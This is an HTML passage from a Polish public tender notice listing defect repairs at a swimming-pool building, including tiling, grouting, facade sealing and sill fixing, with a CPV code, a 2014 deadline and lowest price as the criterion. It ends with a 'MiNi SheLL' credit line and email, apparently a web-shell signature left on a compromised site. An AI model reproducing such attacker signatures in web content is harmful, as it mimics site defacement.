1.12 Wymiana odchodzących płytek na obudowach kanałów wentylacyjnych w hali basenowej oraz pod oknami okrągłymi przy jacuzzi - pkt 16 wg dokumentacji rysunkowej.
1.13 Uzupełnienie fugi między płytkami w części mokrej-hala basenowa, natryski - pkt 17 wg dokumentacji rysunkowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ 3 - Usunięcie usterek, zgodnie z dokumentacją rysunkową:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.6 Doszczelnienie fasad i docieplenie ściany - pkt 7 i 14 wg dokumentacji rysunkowej. 
1.14 Naprawa fugi na ścianie zjeżdżalni - pkt 20 wg dokumentacji rysunkowej. 
1.15 Umocowanie parapetów zewnętrznych - pkt 22 wg dokumentacji rysunkowej. 
1.16 Zdemontowanie obicia z płyt na dźwigarach z drewna klejonego oraz zabezpieczenie drewna - pkt 23 wg dokumentacji rysunkowej.
1.17Oczyszczenie i impregnacja ścian z cegły klinkierowych - pkt 26 wg dokumentacji rysunkowej. 
1.18 Przełożenie opaski wokół budynku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com